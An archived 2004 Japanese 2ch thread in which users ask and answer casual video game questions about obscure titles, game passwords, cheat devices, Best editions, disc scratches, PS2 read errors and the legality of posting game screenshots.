確か品薄らしく結構マイナーなやつらしいです。
記憶が正しければ紙かなんかを折って作る感じのゲーム
だったと思うのですが・・・・・・・。

128 :なまえをいれてください:04/10/31 16:59:24 ID:cUZcmPuL
パネキット?
http://www.amazon.co.jp/exec/obidos/ASIN/B00005OVN1/250-9165752-3621049

129 :なまえをいれてください:04/10/31 17:04:27 ID:Ehc4K+Dw
例えば、「○○○ △△△ □□□」ってパスワードがあったとして
「○○○」の部分を変えるとレベルを変えられて、「△△△」の部分は変えると所持金が増えて、みたいに
パスワードを分析して、自分でパスワード作るって不可能なんですかね?
某ゲームで、いちいち選手育成するのがとても面倒。

130 :なまえをいれてください:04/10/31 17:07:49 ID:cUZcmPuL
>129
プロアクションリプレイでも買えば?

131 :なまえをいれてください:04/10/31 17:12:58 ID:Ehc4K+Dw
あー、そういうものがあるんですか。
調べてみましたが生産終了してるそうです・・・どうもでした。

132 :なまえをいれてください:04/10/31 17:35:05 ID:o9jv2IDh
ID:Ehc4K+Dwはアホか?いろんな意味で

133 :なまえをいれてください:04/10/31 18:04:47 ID:Ehc4K+Dw
は?

134 :なまえをいれてください:04/10/31 18:26:47 ID:6u8Ioexz
生産終了なんてぶっちゃけありえな〜い

135 :なまえをいれてください:04/10/31 18:40:31 ID:Ehc4K+Dw
マジ?
ttp://karat-jp.com/par/par01500.html
これってもう売ってないってことじゃないの?

136 :なまえをいれてください:04/10/31 18:56:48 ID:o9jv2IDh
64かよ!w
まぁ64は確かに店頭では売ってないけどヤフオクでは大抵出品されてるよ
つーか64て。。。

あとパスワード解析は君には無理だ

137 :127:04/10/31 20:29:15 ID:VbNHLNIr
>>128
それです!ありがとうございました!

138 :なまえをいれてください:04/10/31 20:45:34 ID:9gmlPb5C
>>129
ファミコン時代に紙と計算機で解析して遊んだな
結論からいうとどんな馬鹿でも1個ずつ総当りすればOK

139 :なまえをいれてください:04/11/01 00:32:18 ID:w0mBmF6f
今日、ゲームを売りにいったんだが、俺の予想よりはるかに高い金額で買い取ってもらえました。
多分、初回限定版と勘違いしたんだと思うのだが、あとからお金返してくださいって言ってくるかな?
ゲーム買っちゃったんでお金はないわけなのですが。お願いします。

140 :なまえをいれてください:04/11/01 00:34:38 ID:bRYHuZjr
test

141 :なまえをいれてください:04/11/01 00:48:10 ID:zRYl8dX0
>>139
言われないよ。よほどヘンなところじゃない限り。
ミスした時点で店の責任であって、君が返す義務はない。
中古周辺機器の不良品売っちゃったときも同様。

142 :なまえをいれてください:04/11/01 04:17:42 ID:w0mBmF6f
>>141
サンクス

143 :なまえをいれてください:04/11/01 06:00:23 ID:p32lhc06
オフィスクリエイトから出てるアストレイギアを買おうと思ってるんですが

・アスレイトギア
・アスレイトギア・アナザ

と2本出てるようなのです。
アナザの方は続編なのか無印のリメイクなのか、公式見ても通販サイト見てもさっぱり分かりません。

誰かそこんとこ分かる人いたら教えてください。

144 :120:04/11/01 06:23:13 ID:aUmWhiRa
>>122
ルールとかは解るんだけど、あれって意外とじっくり解くゲームだよね。
タイムアップでいつも性格診断まで逝けないのよ。
コンティニューするのはなんか悔しいし・・・
好みの問題だけど、俺はもっと直感的なのが好みだったってことでFA

145 :なまえをいれてください:04/11/01 16:22:53 ID:1FXpLNmV
ゲームソフトで、通常版とベスト版とありますが、
中身は何か違っているのでしょうか?
例えば、ICOの通常版とICOのベスト版では値段がかなり違いますけど、
ストーリーがはしょられているとか、そういう事で安くなってるんでしょうか?
それとも外装がTHE BEST!とか書かれているだけなのですか?

気になって調べてはみたのですが、
一般常識なのか、そのへんの説明がどうしても見つからず…
御存知の方、どうか教えて下さい!

146 :なまえをいれてください:04/11/01 16:45:10 ID:zRYl8dX0
>>145
>そのへんの説明がどうしても見つからず…
こう書けば教えてもらえるとでも?
ためしにググったら5分かからず十分すぎるほどの説明が見つかったが。

147 :なまえをいれてください:04/11/01 17:10:59 ID:1FXpLNmV
>>146
145です、すいません。
検索キーワードの選び方が下手なのでしょうか。
ベスト版の説明を見てもそのへんが書いてなかったのですが…。
また調べてみます。
お邪魔しました、ありがとうございました!

148 :なまえをいれてください:04/11/02 11:09:38 ID:mdZHkkAa
ゲームあらゆる情報がまとめられてるニュースサイトのようなものってありますか?
漫画でいう最後通牒みたいな。

149 :なまえをいれてください:04/11/02 11:15:57 ID:QjpdLk2x
>>148
http://game8.2ch.net/test/read.cgi/ghard/1099293011/1

150 :なまえをいれてください:04/11/02 11:21:38 ID:4lKlAsAC
ディスクの傷を研磨すると、傷は消えても研磨した跡は残りますか?


151 :なまえをいれてください:04/11/02 16:33:58 ID:QjpdLk2x
>>150
うん。
研磨するんなら
読み込みエラーが起きてしょうがない時だけにしておけ
多少傷があっても読めたりするから

152 :なまえをいれてください:04/11/02 20:12:21 ID:PgkAfveh
>>151
業務用のなら傷消えますが。安物じゃない限り。

153 :なまえをいれてください:04/11/02 22:59:50 ID:O1XgVFB8
>>146
まあ公式だとバグ対応したとかのかっこ悪い情報はひた隠しにしてるけどな

154 :なまえをいれてください:04/11/02 23:57:50 ID:mdZHkkAa
>>149
d。

155 :なまえをいれてください:04/11/03 02:03:14 ID:tlfmx1pR
中学生でも経済、金融について楽しく分かりやすく学べるゲームってないでしょうか?
例えば、ザ・コンビニやシムシティなどが良いと思いますが。
コンシューマー、PC問わないので何かあったらお願いします。

156 :なまえをいれてください:04/11/03 02:27:47 ID:+I54tBTa
株取引

157 :なまえをいれてください:04/11/03 02:56:29 ID:+1JNKPi+
ファミコンに松本とおるの、なんとかかんとかってのがあったな


158 :なまえをいれてください:04/11/03 03:15:33 ID:jv5xkqq/
>>155
>ザ・コンビニやシムシティなどが良いと思いますが。
これはギャグで言ってるのか?

159 :なまえをいれてください:04/11/03 04:10:36 ID:gyZtLYm1
>>155
コーエーが昔「エアーマネジメント」っていう
航空会社経営シミュレーションゲームを出してたなぁ。

160 :なまえをいれてください:04/11/03 06:32:29 ID:NADK1QT1
擬似株取引が楽しめるサイトがあった希ガス

161 :なまえをいれてください:04/11/03 12:36:36 ID:LIzhcTqs
バーチャルFXか。

162 :なまえをいれてください:04/11/03 17:22:55 ID:Yv5GhhdS
ポリゴンムービーを見てて思うんだけど、なんでキャラクターって
何もしてないときでもユラユラ微妙に体を揺らしてるの?


163 :なまえをいれてください:04/11/03 17:59:51 ID:rJOE7ltD
貴方も、何もせずにぼーっと立っててみなさいよ。
揺れるヨ揺れるヨ、ユラユラユラユラ

164 :なまえをいれてください:04/11/03 18:33:22 ID:PLl8MtkN
半年間やってなかったメタルギアソリッド2やろうと思ったら何度やってもディスクが読み込めないんですがどうしたらいいでしょうか?ていうか、何故?

165 :なまえをいれてください:04/11/03 18:37:30 ID:jv5xkqq/
故障以外何だと?二層だし同考えてもピックアップが原因だろ
つーかテンプレ嫁

166 :なまえをいれてください:04/11/03 18:45:49 ID:iSAue4PB
>>162
揺れないゲームも探せばあるよ。
機会があったらやってみるといい。
揺れないと不自然に見えるから

167 :なまえをいれてください:04/11/03 19:09:44 ID:17Fgtoeo
>>164
いい加減これテンプレに追加しようぜ
こいつら鬱陶しいよ。

▲ PS2のゲームが「読み込みに失敗しました」と画面に出て起動しません。
▽ ttp://www.playstation.jp/info/i_faq_detail.php?pid=&cid=18&sid=1


168 :なまえをいれてください:04/11/03 19:16:50 ID:Pv47UnPe
アクションゲーム探してます。機種はPS2
・爽快感・スピード感重視
・気が向いたときに30分だけ、とか区切りよくできる
・難易度幅広く
・世界観がSF・アンドロイド・銃器・巨大武器(槍とか剣とか)などが入ってるとグッド。
・バイオ系はニガテ。

自分の好みに合ったのは
ChainDive、オメガブースト、ACシリーズなどなどです
何かオススメがあればお願いします

別質問で悪魔城シリーズはちょこちょこプレイしていたんですが
キャッスルヴァニアはどうなのでしょう。

169 :なまえをいれてください:04/11/03 19:20:31 ID:17Fgtoeo
>>168
その手の質問はここじゃないです。
テンプレの4は読みましたか?
ttp://game8.2ch.net/test/read.cgi/famicom/1099316864/

170 :なまえをいれてください:04/11/03 19:28:50 ID:Pv47UnPe
すいませんでした・・・

171 :白い歯 ◆Z6xkgZj0Nk :04/11/03 20:23:22 ID:FEHqtMVX
>>168
マルチうざいよ

172 :なまえをいれてください:04/11/03 22:15:28 ID:q1iaupdC
PS2で型番がNBってどういうことでしょうか?
後、新しいディスクは読み込めませんとオークションの紹介欄に書いてあったのですが、新旧の違いをどうか教えてください。

六年くらいゲームなどしてなかったのでサッパリわかりません。

173 :なまえをいれてください:04/11/04 00:40:23 ID:EMe41oSp
>>172
NBは本体色を示す記号で、ミッドナイトブラックって名前のクリアブラック
去年の年末ごろから普通のPS2がNBだったはず
新しいソフトってのはよくわからんが2層DVDノソフトを読み込まないとかそういう意味じゃないかと


読み込めないディスクがあるってことは相当酷使した本体の可能性が高いから避けたほうが無難。
本体は素直に新品買っとけ。

174 :なまえをいれてください:04/11/04 03:13:36 ID:IM6W/cj7
ゲームでの動画や画像をキャプって、うpロダやホームページに
アップすることは違法でしょうか?

175 :なまえをいれてください:04/11/04 03:25:12 ID:1YCqAhzt
メーカーから許可を得てない場合は基本的に違法ですが著作権法は親告罪なので、
メーカーからクレームがこない限りは大丈夫だと思う。
最近出たゲームのネタバレ画像や発売前のゲームの画像とか載せてるとクレーム
くるかもしれないが、いきなり逮捕されることはあまりない。

176 :なまえをいれてください:04/11/04 04:39:27 ID:/2jH9IRV
>>174 これ見れ

Webサイト「gameonline」の運営者、ゲーム画像の無断掲載で逮捕
ttp://internet.watch.impress.co.jp/cda/news/2004/05/18/3142.html

ゲーム画像を待ち受け画面用に加工してWebで無断公開、大学生を書類送検
ttp://internet.watch.impress.co.jp/cda/news/2004/10/01/4816.html

177 :なまえをいれてください:04/11/04 06:22:10 ID:ZcsPxRY3
質問なんですが、オリジナル版のセーブをベスト版に流用は可能?

178 :なまえをいれてください:04/11/04 06:50:21 ID:EtiBXox5
>>177
 ソフトによるとしか言いようがないな。
具体的にタイトルを挙げれば、持ってる人が
教えてくれるかもしれない。

179 :なまえをいれてください:04/11/04 12:26:07 ID:CZR+KcSN
基本的に全部可能だよ。
ゲーム内容が変わってしまったものを除き。
たしか侍、侍道2はできないんじゃないかな。それぞれ完全版とかになってるから。

46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)